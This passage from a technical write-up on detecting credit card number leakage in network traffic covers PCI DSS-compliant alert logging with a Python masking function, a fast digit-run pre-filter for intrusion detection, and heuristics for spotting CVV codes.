Logging is just as important as detection for a monitoring system. This is all the more so with credit card number detection: in many cases a security breach can be mitigated better if the organization knows what information actually leaked. For example, various state disclosure bills, such as California SB-1386, require an organization to notify all affected clients in case of a breach. If the organization does not know who the affected clients are, it must notify everyone, raising the cost of the breach and the media exposure.

Unfortunately, logging credit card leakage incidents is not trivial. PCI DSS does not allow the credit card number itself to be logged. On the other hand, the log record must include enough information to be useful. A useful implementation must keep two levels of log:

  1. Alert logs that can be used to analyze what happened, but that do not include the actual credit card number (at most a masked version of it).
  2. An encrypted store for the credit card data itself.
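For the first level, a common compromise is to keep only the last four digits. The sketch below illustrates one such masking policy (the policy itself is an assumption for illustration, not a PCI DSS prescription):

```python
def mask_card_number(number: str) -> str:
    """Replace all but the last four digits with asterisks,
    preserving any dash or space delimiters for readability."""
    remaining = sum(ch.isdigit() for ch in number)
    masked = []
    for ch in number:
        if ch.isdigit():
            # Keep a digit only once we are down to the last four.
            masked.append(ch if remaining <= 4 else "*")
            remaining -= 1
        else:
            masked.append(ch)
    return "".join(masked)

print(mask_card_number("4111-1111-1111-1111"))  # ****-****-****-1111
```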

4.3 Performance

Regular expressions are not very efficient, and therefore most IDSs try to avoid testing the payload against a large number of regular expressions. To achieve that, an IDS first uses an efficient parallel matching algorithm such as Aho-Corasick, which is very fast and uses a single pass through the payload to check for all signatures. On the other hand, parallel matching can only match simple strings; only if a certain simple string matches is a follow-up regular expression tested. To reduce the number of regular expression tests required, the parallel matching algorithm searches for the longest constant string extracted from each regular expression.

Unfortunately, the regular expressions presented so far in this write-up do not contain any fixed string, as they look for a sequence of digits. Parallel matching algorithms can be adapted to search efficiently for a string of character groups, digits in this case, rather than a string of literal characters, but the implementations found in most IDSs do not support it.
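One workable compromise is a hand-rolled single-pass scan for long digit runs, used as a cheap pre-qualifier before the full regular expression and checksum validation. A sketch of the idea:

```python
def has_long_digit_run(payload: str, min_digits: int = 13) -> bool:
    """Single pass over the payload counting digits; dashes and spaces
    are tolerated inside a run, while any other character resets the
    count. Intended as a cheap pre-qualifier: only payloads that pass
    this scan are handed to the regex + LUHN validation stage."""
    count = 0
    for ch in payload:
        if ch.isdigit():
            count += 1
            if count >= min_digits:
                return True
        elif ch not in "- ":
            count = 0
    return False

print(has_long_digit_run("no numbers here"))           # False
print(has_long_digit_run("card 4111-1111-1111-1111"))  # True
```

Like any pre-filter it over-matches (unrelated digit groups separated by spaces accumulate into one run), but that only costs an occasional unnecessary regex test, never a missed card number.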

Additionally, the performance cost of running a checksum algorithm over any sequence matching must be taken into account.

4.4 Other Sensitive Identifiers

While credit card numbers are the most well-known sensitive identifier for which PCI DSS requires special attention, they are neither the only one nor the most sensitive. The Card Verification Value (CVV) is a 3- or 4-digit code on the back of a credit card that is often used as an additional identification number in online transactions. The CVV is even more sensitive than a credit card number, but much harder to detect, as it is so short and has no checksum digit.

One way to detect use of CVV numbers is to find a 3- or 4-digit value in a field on a form where a credit card number was also found. This method is far from immune to false positives, but in paranoid environments it might do the trick.

5. Conclusion

Detecting theft of credit card numbers by monitoring network traffic is very difficult, but such monitoring can be useful for detecting unintentional leakage of credit card numbers. To do so, the monitoring system has to be application- and protocol-aware, so that it can both compensate for encoding and encryption applied to the data and provide a tool for creating exceptions for legitimately transmitted credit card numbers or for other information falsely detected as credit card numbers.